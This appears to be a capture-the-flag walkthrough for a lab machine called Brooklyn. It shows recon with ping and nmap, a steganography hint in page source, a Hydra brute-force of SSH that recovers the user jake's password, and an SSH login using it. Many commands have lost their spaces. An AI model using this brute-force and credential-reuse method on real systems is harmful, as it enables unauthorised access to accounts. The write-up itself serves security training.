Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
suecho"10.10.218.233 brooklyn.thm">>/etc/hostsmkdirthm/brooklyn.thmcdthm/brooklyn.thm# At the end of the room# To clean up the last line from the /etc/hosts filesed-i'$ d'/etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 16:08 EDT
Nmap scan report for brooklyn.thm (10.10.218.233)
Host is up (0.073s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.80.228
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We found a good info: ftp-anon: Anonymous FTP login allowed (FTP code 230), but first we check the port 80.
inspecting source code we found this message:
<!DOCTYPEhtml><html><head><meta name="viewport" content="width=device-width, initial-scale=1"><style>body,html{height:100%;margin:0;}.bg{/*Theimageused*/background-image:url("brooklyn99.jpg");/*Fullheight*/height:100%; /*Centerandscaletheimagenicely*/background-position:center;background-repeat:no-repeat;background-size:cover;}</style></head><body><div class="bg"></div><p>This example creates a full page background image. Try to resize the browser window to see how it always will cover the full screen (whenscrolledtotop), and that it scales nicely on all screen sizes.</p><!--Haveyoueverheardofsteganography?--></body></html>
Hydrav9.4 (c) 2022 by van Hauser/THC &DavidMaciejak-Pleasedonotuseinmilitaryorsecretserviceorganizations,orforillegalpurposes (this isnon-binding,these***ignorelawsandethicsanyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-24 05:56:00[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task[DATA] attacking ssh://brooklyn.thm:22/[22][ssh] host: brooklyn.thm login: jake password: 987654321
jake::987654321
We can use the credentials obtained for ssh access:
sshjake@brooklyn.thmjake@brooklyn.thm's password: Last login: Tue May 26 08:56:58 2020